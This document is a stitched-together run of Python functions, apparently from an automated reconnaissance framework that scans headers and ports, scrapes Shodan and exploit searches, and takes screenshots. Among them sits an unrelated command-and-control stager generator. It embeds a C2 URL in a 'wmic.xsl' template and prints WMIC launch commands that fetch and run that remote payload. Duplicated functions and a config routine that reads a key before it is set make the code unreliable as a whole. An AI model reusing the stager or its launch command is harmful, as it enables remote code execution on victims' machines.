def __init__(self, options): utils.print_banner("Headers Scanning") utils.make_directory(options['WORKSPACE'] + '/headers') utils.make_directory(options['WORKSPACE'] + '/headers/details') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("Detect is already done. use '-f' options to force rerun the module") return self.is_direct = utils.is_direct_mode(options, require_input=True) slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET']) }) self.initial() slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET']) })
def __init__(self, options): utils.print_banner("Headers Scanning") utils.make_directory(options['WORKSPACE'] + '/headers') utils.make_directory(options['WORKSPACE'] + '/headers/details') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return self.is_direct = utils.is_direct_mode(options, require_input=True) slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET']) }) self.initial() slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Headers Scanning for {0}'.format(self.options['TARGET']) })
def generate(self, listener, filename=None): stager_filename = 'wmic.xsl' if filename is not None: stager_filename = filename with open(stager_filename, 'w') as stager: with open('stagers/templates/wmic.xsl') as template: template = template.read() template = template.replace( 'C2_URL', f"https://{listener['BindIP']}:{listener['Port']}") template = template.replace('C2_CHANNEL', f"{listener.name}") stager.write(template) print_good(f"Generated stager to {stager.name}") print_info("Launch with:") print( f"\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:\"https://myurl/{stager_filename}\"" ) print( f"\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:\"{stager_filename}\"" )
def pages(self, page_num): for i in range(2, int(page_num) + 1): utils.print_info("Sleep for couple seconds because Shodan server is really strict") utils.random_sleep(3, 6) utils.print_info("Get more result from page: {0}".format(str(i))) query = utils.url_encode(self.options['shodan_query']) url = 'https://www.shodan.io/search?query={1}&page={0}'.format( str(i), query) r = sender.send_get(self.options, url, self.cookies) if r.status_code == 200: response = r.text if 'class="alert alert-error text-center"' in response: utils.print_bad( "Reach to the limit at page {0}".format(str(i))) return else: soup = utils.soup(response) self.analyze(soup)
def main_routine(self, results, kind='code'): pages = self.get_page(results) utils.print_info(f"Detect {str(pages)} pages by search for {kind}") for i in range(pages): # utils.print_info(f"Search in pages {str(i)}") page_results = results.get_page(page=i) if not page_results: return # content from each page for result in page_results: if kind == 'code': item = self.parse_code(result) if kind == 'issue': item = self.parse_issue(result) if kind == 'commit': item = self.parse_commit(result) if kind == 'repo': item = self.parse_repo(result) if kind == 'user': item = self.parse_user(result) self.write_result(item, kind=kind)
def pages(self, page_num): more_output = [] for i in range(1, int(page_num) + 1): utils.print_debug(self.options, "Sleep for couple seconds") utils.random_sleep(1, 3) utils.print_info("Get more result from page: {0}".format(str(i))) data = {"type": "exploits", "sort": "default", "query": self.query, "title": not self.options.get('relatively'), "offset": i * 10} r = sender.send_post( self.options, self.base_url, data, is_json=True) if r.status_code == 200: response = json.loads(r.text) if self.analyze(response): more_output += self.analyze(response) else: return False return more_output
def __init__(self, options): utils.print_banner("Port Scanning") utils.make_directory(options['WORKSPACE'] + '/portscan') utils.make_directory(options['WORKSPACE'] + '/subdomain') self.module_name = self.__class__.__name__ self.options = options self.options['SPEED'] = utils.custom_speed(self.options) if utils.resume(self.options, self.module_name): utils.print_info( "It's already done. use '-f' options to force rerun the module" ) return self.is_direct = utils.is_direct_mode(options, require_input=True) slack.slack_noti( 'status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Port Scanning for {0}'.format(self.options['TARGET']) }) self.initial() utils.just_waiting(self.options, self.module_name, seconds=60) self.conclude() slack.slack_noti( 'good', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Port Scanning for {0}'.format(self.options['TARGET']) }) utils.print_line()
def screenshots(self, csv_data): utils.print_info("Screenshot again with new port found") # add http:// and https:// prefix to domain if csv_data: result = [] for line in csv_data.splitlines()[1:]: # some output of the script is contain new line try: # print(line) host = line.split(',')[0] port = line.split(',')[4] result.append("http://" + host + ":" + port) result.append("https://" + host + ":" + port) except: pass utils.just_write( utils.replace_argument( self.options, '$WORKSPACE/vulnscan/$OUTPUT-hosts.txt'), "\n".join(result)) # screenshots with gowitness utils.make_directory(self.options['WORKSPACE'] + '/vulnscan/screenshoots-nmap/') cmd = "$GO_PATH/gowitness file -s $WORKSPACE/vulnscan/$OUTPUT-hosts.txt -t 30 --log-level fatal --destination $WORKSPACE/vulnscan/screenshoots-nmap/ --db $WORKSPACE/vulnscan/screenshoots-nmap/gowitness.db" execute.send_cmd(self.options, utils.replace_argument(self.options, cmd), '', '', self.module_name) utils.just_waiting(self.options, self.module_name, seconds=10) cmd = "$GO_PATH/gowitness generate -n $WORKSPACE/vulnscan/$OUTPUT-nmap-screenshots.html --destination $WORKSPACE/vulnscan/screenshoots-nmap/ --db $WORKSPACE/vulnscan/screenshoots-nmap/gowitness.db" html_path = utils.replace_argument( self.options, "$WORKSPACE/vulnscan/$OUTPUT-nmap-screenshots.html") execute.send_cmd(self.options, utils.replace_argument(self.options, cmd), html_path, '', self.module_name)
def __init__(self, options): utils.print_banner("Reconnaisance") utils.make_directory(options['WORKSPACE'] + '/recon') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info( "It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Scanning Subdomain for {0}'.format(self.options['TARGET']) }) self.initial() self.conclude() #this gonna run after module is done to update the main json slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name), 'content': 'Done Scanning Subdomain for {0}'.format(self.options['TARGET']) })
def create_skeleton_json(self): outout = utils.replace_argument( self.options, '$WORKSPACE/$COMPANY.json') if utils.not_empty_file(outout): utils.print_info("Modules is already done") return main_json = { "Company": utils.replace_argument(self.options, '$COMPANY'), "Main_domain": utils.replace_argument(self.options, '$TARGET'), "Info": {}, "Subdomains": [], "Modules": {}, "IP Space": [] } utils.just_write(outout, main_json, is_json=True) utils.check_output(outout) slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Create skeleton json' })
def proxy_parsing(options): # return if proxy config file found if options['PROXY_FILE'] != "None": proxy_file = options['PROXY_FILE'] utils.print_info("Detected proxychains file: {0}".format(proxy_file)) return elif options['PROXY'] != "None": proxy_file = options['CWD'] + '/core/proxychains.conf' utils.print_info("Detected proxychains file: {0}".format(proxy_file)) if options['PROXY'] != "None": proxy_parsed = urllib.parse.urlsplit(options['PROXY']) scheme = proxy_parsed.scheme host = proxy_parsed.netloc.split(':')[0] port = proxy_parsed.netloc.split(':')[1] proxy_element = "\n" + scheme + " " + host + " " + port raw_data = utils.just_read(proxy_file).splitlines() for i in range(len(raw_data)): if '[ProxyList]' in raw_data[i]: init_part = raw_data[:i] proxy_part = raw_data[i:] # check if this proxy is exist or not check_duplicate = False for item in proxy_part: if proxy_element.strip() in item.strip(): check_duplicate = True if not check_duplicate: proxy_part.append(proxy_element) real_proxy_data = "\n".join(init_part + proxy_part) utils.just_write(proxy_file, real_proxy_data) if options['PROXY'] != "None" or options['PROXY_FILE'] != "None": if not shutil.which(options['PROXY_CMD'].split(' ')[0]): utils.print_bad("Look like proxy mode doesn't support your OS") sys.exit(0) else: #simple check for proxy is good utils.print_info("Testing proxy with simple curl command") if execute.run(options['PROXY_CMD'] + " curl -s ipinfo.io/ip") == execute.run("curl -s ipinfo.io/ip"): utils.print_bad("Look like your proxy not work properly") sys.exit(0)
def notify_session_staged(self, msg): print_info(msg)
def dirhunt(self): utils.print_good('Starting dirhunt') cmd = 'dirhunt $TARGET $MORE --progress-disabled --threads 20 | tee $WORKSPACE/directory/$STRIP_TARGET-dirhunt.txt' cmd = utils.replace_argument(self.options, cmd) utils.print_info("Execute: {0} ".format(cmd)) execute.run(cmd)
def parsing_config(config_path, args): options = {} ##some default path github_api_key = str(os.getenv("GITROB_ACCESS_TOKEN")) cwd = str(os.getcwd()) #just hardcode if gopath not loaded go_path = cwd + "/plugins/go" # go_path = str(os.getenv("GOPATH")) + "/bin" # if "None" in go_path: # go_path = cwd + "/plugins/go" bot_token = str(os.getenv("SLACK_BOT_TOKEN")) log_channel = str(os.getenv("LOG_CHANNEL")) status_channel = str(os.getenv("STATUS_CHANNEL")) report_channel = str(os.getenv("REPORT_CHANNEL")) stds_channel = str(os.getenv("STDS_CHANNEL")) verbose_report_channel = str(os.getenv("VERBOSE_REPORT_CHANNEL")) if os.path.isfile(config_path): utils.print_info('Config file detected: {0}'.format(config_path)) #config to logging some output config = ConfigParser(interpolation=ExtendedInterpolation()) config.read(config_path) else: utils.print_info('New config file created: {0}'.format(config_path)) shutil.copyfile(cwd + '/template-config.conf', config_path) config = ConfigParser(interpolation=ExtendedInterpolation()) config.read(config_path) workspace = cwd + "/workspaces/" config.set('Enviroments', 'cwd', cwd) config.set('Enviroments', 'go_path', go_path) config.set('Enviroments', 'github_api_key', github_api_key) config.set('Enviroments', 'workspaces', str(workspace)) if args.debug: config.set('Slack', 'bot_token', 'bot_token') config.set('Slack', 'log_channel', 'log_channel') config.set('Slack', 'status_channel', 'status_channel') config.set('Slack', 'report_channel', 'report_channel') config.set('Slack', 'stds_channel', 'stds_channel') config.set('Slack', 'verbose_report_channel', 'verbose_report_channel') else: config.set('Slack', 'bot_token', bot_token) config.set('Slack', 'log_channel', log_channel) config.set('Slack', 'status_channel', status_channel) config.set('Slack', 'report_channel', report_channel) config.set('Slack', 'stds_channel', stds_channel) config.set('Slack', 'verbose_report_channel', verbose_report_channel) ##config of the tool if args.slow: speed = "slow" else: speed = "quick" module = str(args.module) debug = str(args.debug) force = str(args.force) config.set('Mode', 'speed', speed) config.set('Mode', 'module', module) config.set('Mode', 'debug', debug) config.set('Mode', 'force', force) ##target stuff #parsing agument git_target = args.git if args.git else None burpstate_target = args.burp if args.burp else None target_list = args.targetlist if args.targetlist else None company = args.company if args.company else None direct_input = args.input if args.input else None if args.target: target = args.target output = args.output if args.output else args.target company = args.company if args.company else args.target strip_target = target.replace('https://', '').replace('http://', '') if '/' in strip_target: strip_target = strip_target.split('/')[0] if args.workspace: if args.workspace[-1] == '/': workspace = args.workspace + options['env']['STRIP_TARGET'] else: workspace = args.workspace + '/' + options['env']['STRIP_TARGET'] else: workspace += strip_target if not direct_input: try: ip = socket.gethostbyname(strip_target) except: ip = "None" utils.print_bad("Something wrong to connect to {0}".format(target)) else: ip = None try: #getting proxy from args proxy = args.proxy if args.proxy else None proxy_file = args.proxy_file if args.proxy_file else None config.set('Proxy', 'proxy', str(proxy)) config.set('Proxy', 'proxy_file', str(proxy_file)) if config['Proxy']['proxy_cmd'] == 'None': #only works for Kali proxychains, change it if you on other OS proxy_cmd = "proxychains -f {0}".format(proxy_file) config.set('Proxy', 'proxy_cmd', str(proxy_cmd)) except: utils.print_info("Your config file seem to be outdated, Backup it and delete it to regenerate the new one") config.set('Target', 'input', str(direct_input)) config.set('Target', 'git_target', str(git_target)) config.set('Target', 'burpstate_target', str(burpstate_target)) config.set('Target', 'target_list', str(target_list)) config.set('Target', 'output', str(output)) config.set('Target', 'target', str(target)) config.set('Target', 'strip_target', str(strip_target)) config.set('Target', 'company', str(company)) config.set('Target', 'ip', str(ip)) config.set('Enviroments', 'workspace', str(workspace)) #create workspace folder for the target utils.make_directory(workspace) #set the remote API if args.remote: remote_api = args.remote config.set('Server', 'remote_api', remote_api) #set credentials as you define from agurments if args.auth: #user:pass creds = args.auth.strip().split(":") username = creds[0] password = creds[1] config.set('Server', 'username', username) config.set('Server', 'password', password) else: #set random password if default password detect if config['Server']['password'] == 'super_secret': new_pass = ''.join(random.choice(string.ascii_lowercase) for i in range(6)).upper() config.set('Server', 'password', new_pass) #save the config with open(config_path, 'w') as configfile: config.write(configfile) config = ConfigParser(interpolation=ExtendedInterpolation()) config.read(config_path) sections = config.sections() for sec in sections: for key in config[sec]: options[key.upper()] = config.get(sec, key) ###### #parsing proxy stuff if options.get('PROXY') or options.get('PROXY_FILE'): proxy_parsing(options) else: #just for the old config options['PROXY'] = "None" options['PROXY_FILE'] = "None" return options